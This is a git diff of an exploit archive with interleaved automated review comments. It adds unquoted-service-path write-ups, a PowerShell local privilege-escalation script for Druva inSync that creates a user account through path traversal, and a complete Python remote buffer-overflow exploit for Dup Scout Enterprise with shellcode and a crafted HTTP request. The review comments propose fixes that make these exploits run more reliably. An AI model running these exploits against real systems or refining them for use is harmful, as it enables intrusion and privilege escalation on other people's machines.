+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Andrea ST Filters Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other security
+applications where it could potentially be executed during application
+startup or reboot. If successful, the local user's code would execute with
+the elevated privileges of the application.
\ No newline at end of file
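Review bot: The identifiers in this entry do not line up, so a reader cannot tell which service, binary and vendor directory are affected. The title names `AERTSr64.EXE` and Realtek and the wmic row lists service `AERTFilters`, but `sc qc` is run against `AESTFilters` with binary `C:\Program Files\IDT\WDM\AESTSr64.exe` and display name "Andrea ST Filters Service". The title, the wmic row and the `sc qc` block should be made consistent with whatever was actually tested.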
diff --git a/exploits/windows/local/49203.txt b/exploits/windows/local/49203.txt
new file mode 100644
index 000000000..53d0928a3
--- /dev/null
+++ b/exploits/windows/local/49203.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+
+C:\Users\m507>sc qc "RumbleService"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: RumbleService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Rumble\rumble_win32.exe --service
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Rumble Mail Server
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/49205.txt b/exploits/windows/local/49205.txt
new file mode 100644
index 000000000..69f50d3c0
--- /dev/null
+++ b/exploits/windows/local/49205.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path
+# Discovery by: Ismael Nava
+# Discovery Date: 05-12-2020
+# Vendor Homepage: https://www.kite.com/
+# Software Links : https://www.kite.com/download/
+# Tested Version: 1.2020.1119.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+KiteService	KiteService	C:\Program Files\Kite\KiteService.exe	Auto
+
+
+C:\>sc qc "KiteService"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: KiteService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : KiteService
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49211.ps1 b/exploits/windows/local/49211.ps1
new file mode 100644
index 000000000..13589ac59
--- /dev/null
+++ b/exploits/windows/local/49211.ps1
@@ -0,0 +1,32 @@
+# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)
+# Date: 2020-12-03
+# Exploit Author: 1F98D
+# Original Author: Matteo Malvica
+# Vendor Homepage: druva.com
+# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
+# Version: 6.6.3
+# Tested on: Windows 10 (x64)
+# CVE: CVE-2020-5752
+# References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/
+# Druva inSync exposes an RPC service which is vulnerable to a command injection attack.
+
+$ErrorActionPreference = "Stop"
+
+$cmd = "net user pwnd /add"
+
+$s = New-Object System.Net.Sockets.Socket(
+    [System.Net.Sockets.AddressFamily]::InterNetwork,
+    [System.Net.Sockets.SocketType]::Stream,
+    [System.Net.Sockets.ProtocolType]::Tcp
+)
+$s.Connect("127.0.0.1", 6064)
+
+$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
+$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
+$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
+$length = [System.BitConverter]::GetBytes($command.Length);
+
+$s.Send($header)
+$s.Send($rpcType)
+$s.Send($length)
+$s.Send($command)
\ No newline at end of file
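Review bot: The header comment calls this a command injection, but the `$command` line works by starting the executable path with `C:\ProgramData\Druva\inSync4\` and walking back out with `..\..\..\`, which suggests the service validates only a path prefix; the comment should say path traversal, matching the linked reference, so readers look for the right root cause. The script also leaves state behind without saying so: `$cmd` creates a local account named `pwnd`, and the socket `$s` is never closed. I would add `# Side effect: creates local user 'pwnd' with the service's privileges; remove it after testing` above `$cmd` and end the script with `$s.Close()`. For defenders, the header could also note that account-creation auditing (Security event 4720) and a `cmd.exe` child of the inSync service are the observable traces.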
diff --git a/exploits/windows/remote/46697.py b/exploits/windows/remote/46697.py
index 7c881a738..3b65609ac 100755
--- a/exploits/windows/remote/46697.py
+++ b/exploits/windows/remote/46697.py
@@ -71,6 +71,8 @@ def SendString(string,ip):
     for char in string:
         target = socket(AF_INET, SOCK_DGRAM)
         target.sendto(characters[char],(ip,1978))
+        sleep(0.5)
+
     
 
 
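Review bot: The added `sleep(0.5)` is a bare call and nothing in this hunk shows `sleep` being imported; if the file only has `import time`, this raises NameError on the first character, so confirm there is a `from time import sleep` at the top of the file. The half-second delay is also an unexplained magic number; a named constant with a comment saying why the receiver needs pacing would document the change. The loop still opens a new UDP socket for every character and never closes it. `SendString` starts outside this hunk, so the rest of the function is not visible here.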
diff --git a/exploits/windows/remote/49210.py b/exploits/windows/remote/49210.py
new file mode 100755
index 000000000..809e75ea0
--- /dev/null
+++ b/exploits/windows/remote/49210.py
@@ -0,0 +1,63 @@
+# Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow
+# Requires web service to be enabled.
+# Tested on Windows 10 Pro (x64)
+# Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457
+# Credits: Tulpa and SICKNESS for original exploits
+# Modified: @0rbz_
+
+import socket,os,time,struct,argparse,sys
+
+parser = argparse.ArgumentParser()
+parser.add_argument('--host', required=True)
+args = parser.parse_args()
+
+host = args.host
+port = 80
+
+# msfvenom --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py
+
+buf =  ""
+buf += "\xb8\xa0\xa1\xfd\x38\xd9\xf7\xd9\x74\x24\xf4\x5a\x31"
+buf += "\xc9\xb1\x31\x31\x42\x13\x83\xc2\x04\x03\x42\xaf\x43"
+buf += "\x08\xc4\x47\x01\xf3\x35\x97\x66\x7d\xd0\xa6\xa6\x19"
+buf += "\x90\x98\x16\x69\xf4\x14\xdc\x3f\xed\xaf\x90\x97\x02"
+buf += "\x18\x1e\xce\x2d\x99\x33\x32\x2f\x19\x4e\x67\x8f\x20"
+buf += "\x81\x7a\xce\x65\xfc\x77\x82\x3e\x8a\x2a\x33\x4b\xc6"
+buf += "\xf6\xb8\x07\xc6\x7e\x5c\xdf\xe9\xaf\xf3\x54\xb0\x6f"
+buf += "\xf5\xb9\xc8\x39\xed\xde\xf5\xf0\x86\x14\x81\x02\x4f"
+buf += "\x65\x6a\xa8\xae\x4a\x99\xb0\xf7\x6c\x42\xc7\x01\x8f"
+buf += "\xff\xd0\xd5\xf2\xdb\x55\xce\x54\xaf\xce\x2a\x65\x7c"
+buf += "\x88\xb9\x69\xc9\xde\xe6\x6d\xcc\x33\x9d\x89\x45\xb2"
+buf += "\x72\x18\x1d\x91\x56\x41\xc5\xb8\xcf\x2f\xa8\xc5\x10"
+buf += "\x90\x15\x60\x5a\x3c\x41\x19\x01\x2a\x94\xaf\x3f\x18"
+buf += "\x96\xaf\x3f\x0c\xff\x9e\xb4\xc3\x78\x1f\x1f\xa0\x77"
+buf += "\x55\x02\x80\x1f\x30\xd6\x91\x7d\xc3\x0c\xd5\x7b\x40"
+buf += "\xa5\xa5\x7f\x58\xcc\xa0\xc4\xde\x3c\xd8\x55\x8b\x42"
+buf += "\x4f\x55\x9e\x20\x0e\xc5\x42\x89\xb5\x6d\xe0\xd5"
+
+buffer = "\x41" * 260
+buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
+buffer += "\x90" * 20
+buffer += buf
+buffer += "\x90" * (10000 - len(buffer))
+
+evil =  "POST /online_registration HTTP/1.1\r\n"
+evil += "Host: " + sys.argv[2] +"\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "customer_name=" + buffer
+evil += "&unlock_key=" + buffer + "\r\n"
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect((host,port))
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
\ No newline at end of file
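Review bot: The `Host:` header is built from `sys.argv[2]` even though the target is already parsed into `host` by argparse; when the script is invoked as `--host=ADDR` there is no `sys.argv[2]` and it stops with IndexError while building the request. Use the parsed value instead, `evil += "Host: " + host + "\r\n"`. The file is also Python 2 only (`print 'Sending evil buffer...'`, and `buffer += struct.pack("<L", ...)` appended to a `str`), which the header comments do not mention; a `# Requires Python 2.7` line would save readers a confusing SyntaxError.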
diff --git a/files_exploits.csv b/files_exploits.csv
index d8fd509ac..9334b50e4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6763,6 +6763,8 @@ id,file,description,date,author,type,platform,port
 49083,exploits/windows/dos/49083.pl,"Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)",2020-11-19,"Vincent Wolterman",dos,windows,
 49105,exploits/multiple/dos/49105.py,"Pure-FTPd 1.0.48 - Remote Denial of Service",2020-11-26,xynmaps,dos,multiple,
 49119,exploits/linux/dos/49119.py,"libupnp 1.6.18 - Stack-based buffer overflow (DoS)",2020-11-27,"Patrik Lantz",dos,linux,
+49206,exploits/windows/dos/49206.txt,"TapinRadio 2.13.7 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
+49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10416,6 +10418,7 @@ id,file,description,date,author,type,platform,port
 49012,exploits/windows/local/49012.txt,"Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
 49013,exploits/windows/local/49013.txt,"Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
 49014,exploits/windows/local/49014.txt,"Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
+49015,exploits/windows/local/49015.txt,"Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
 49016,exploits/windows/local/49016.txt,"MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
 49017,exploits/windows/local/49017.txt,"Magic Mouse 2 utilities  2.20 - 'magicmouse2service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
 49018,exploits/windows/local/49018.txt,"iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path",2020-11-09,"Leslie Lara",local,windows,
@@ -11218,9 +11221,13 @@ id,file,description,date,author,type,platform,port
 49144,exploits/windows/local/49144.bat,"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path",2020-12-01,"Metin Yunus Kandemir",local,windows,
 49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,
 49157,exploits/windows/local/49157.txt,"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
+49158,exploits/windows/local/49158.txt,"Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
 49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,
 49191,exploits/windows/local/49191.txt,"IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path",2020-12-04,"Diego Cañada",local,windows,
 49195,exploits/multiple/local/49195.js,"Chromium 83 - Full CSP Bypass",2020-12-04,"Gal Weizman",local,multiple,
+49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
+49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
+49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17886,6 +17893,7 @@ id,file,description,date,author,type,platform,port
 42787,exploits/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access",2017-09-25,LiquidWorm,remote,hardware,
 42790,exploits/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",remote,linux,
 42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,remote,multiple,5858
+49210,exploits/windows/remote/49210.py,"Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow",2020-12-07,0rbz_,remote,windows,
 48816,exploits/windows/remote/48816.py,"Microsoft SQL Server Reporting Services 2016 - Remote Code Execution",2020-09-17,"West Shepherd",remote,windows,
 48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,
 48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware,
@@ -38777,7 +38785,7 @@ id,file,description,date,author,type,platform,port
 39030,exploits/php/webapps/39030.txt,"BloofoxCMS - '/bloofox/admin/index.php?Username' SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
 39031,exploits/php/webapps/39031.html,"BloofoxCMS - '/admin/index.php' Cross-Site Request Forgery (Add Admin)",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
 39032,exploits/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Local File Inclusion",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
-39033,exploits/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",webapps,php,80
+39033,exploits/php/webapps/39033.py,"Joomla! 1.5 < 3.4.6 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",webapps,php,80
 39034,exploits/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,webapps,php,80
 39099,exploits/php/webapps/39099.txt,"Rhino - Cross-Site Scripting / Password Reset",2014-02-12,Slotleet,webapps,php,
 39038,exploits/php/webapps/39038.txt,"pfSense 2.2.5 - Directory Traversal",2015-12-18,R-73eN,webapps,php,
@@ -43199,6 +43207,7 @@ id,file,description,date,author,type,platform,port
 48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
 48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
 48642,exploits/linux/webapps/48642.sh,"BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI'  Remote Code Execution",2020-07-06,"Critical Start",webapps,linux,
+48614,exploits/hardware/webapps/48614.txt,"Eaton Intelligent Power Manager 1.6 - Directory Traversal",2020-06-22,"Emre ÖVÜNÇ",webapps,hardware,
 48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php,
 48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,
 48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple,
@@ -43255,6 +43264,7 @@ id,file,description,date,author,type,platform,port
 48694,exploits/hardware/webapps/48694.txt,"UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)",2020-07-26,LiquidWorm,webapps,hardware,
 48698,exploits/php/webapps/48698.txt,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
 48699,exploits/php/webapps/48699.sh,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
+48700,exploits/php/webapps/48700.txt,"PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting",2020-07-26,"Emre ÖVÜNÇ",webapps,php,
 48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple,
 48702,exploits/php/webapps/48702.txt,"LibreHealth 2.0.0 - Authenticated Remote Code Execution",2020-07-26,boku,webapps,php,
 48704,exploits/php/webapps/48704.py,"Online Course Registration 1.0 - Unauthenticated Remote Code Execution",2020-07-26,boku,webapps,php,
@@ -43324,6 +43334,7 @@ id,file,description,date,author,type,platform,port
 48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,
 48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,
 49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
+49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,
 49069,exploits/php/webapps/49069.txt,"Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)",2020-11-18,ZwX,webapps,php,
 49070,exploits/multiple/webapps/49070.txt,"BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery",2020-11-18,"RedTeam Pentesting GmbH",webapps,multiple,
 49072,exploits/multiple/webapps/49072.txt,"PESCMS TEAM 2.3.2 - Multiple Reflected XSS",2020-11-19,icekam,webapps,multiple,
@@ -43391,6 +43402,7 @@ id,file,description,date,author,type,platform,port
 49162,exploits/multiple/webapps/49162.txt,"Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting",2020-12-02,"Parshwa Bhavsar",webapps,multiple,
 49163,exploits/multiple/webapps/49163.txt,"Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass",2020-12-02,"Aditya Wakhlu",webapps,multiple,
 49164,exploits/php/webapps/49164.txt,"WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting",2020-12-02,"Hemant Patidar",webapps,php,
+49165,exploits/multiple/webapps/49165.txt,"Employee Record Management System 1.1 - Login Bypass SQL Injection",2020-12-02,"Anurag Kumar",webapps,multiple,
 49166,exploits/multiple/webapps/49166.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Add Artwork",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
 49167,exploits/multiple/webapps/49167.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
 49168,exploits/multiple/webapps/49168.txt,"DotCMS 20.11 - Stored Cross-Site Scripting",2020-12-02,"Hardik Solanki",webapps,multiple,
@@ -43402,6 +43414,7 @@ id,file,description,date,author,type,platform,port
 49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
 49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
 49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
+49180,exploits/php/webapps/49180.txt,"User Registration & Login and User Management System 2.1 - Cross Site Request Forgery",2020-12-03,"Dipak Panchal",webapps,php,
 49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php,
 49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,
 49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,
@@ -43418,3 +43431,8 @@ id,file,description,date,author,type,platform,port
 49198,exploits/php/webapps/49198.txt,"Laravel Nova 3.7.0 - 'range' DoS",2020-12-04,iqzer0,webapps,php,
 49199,exploits/php/webapps/49199.txt,"CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)",2020-12-04,"Eshan Singh",webapps,php,
 49202,exploits/php/webapps/49202.txt,"Zabbix 5.0.0 - Stored XSS via URL Widget Iframe",2020-12-04,"Shwetabh Vishnoi",webapps,php,
+49204,exploits/php/webapps/49204.txt,"Cyber Cafe Management System  Project (CCMS) 1.0 - Persistent Cross-Site Scripting",2020-12-07,"Pruthvi Nekkanti",webapps,php,
+49208,exploits/php/webapps/49208.txt,"Savsoft Quiz 5 - 'Skype ID' Stored XSS",2020-12-07,"Dipak Panchal",webapps,php,
+49209,exploits/php/webapps/49209.txt,"vBulletin 5.6.3 - 'group' Cross Site Scripting",2020-12-07,Vincent666,webapps,php,
+49212,exploits/php/webapps/49212.txt,"Online Bus Ticket Reservation 1.0 - SQL Injection",2020-12-08,"Sakshi Sharma",webapps,php,
+49215,exploits/php/webapps/49215.txt,"Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting",2020-12-08,"Ritesh Gohil",webapps,php,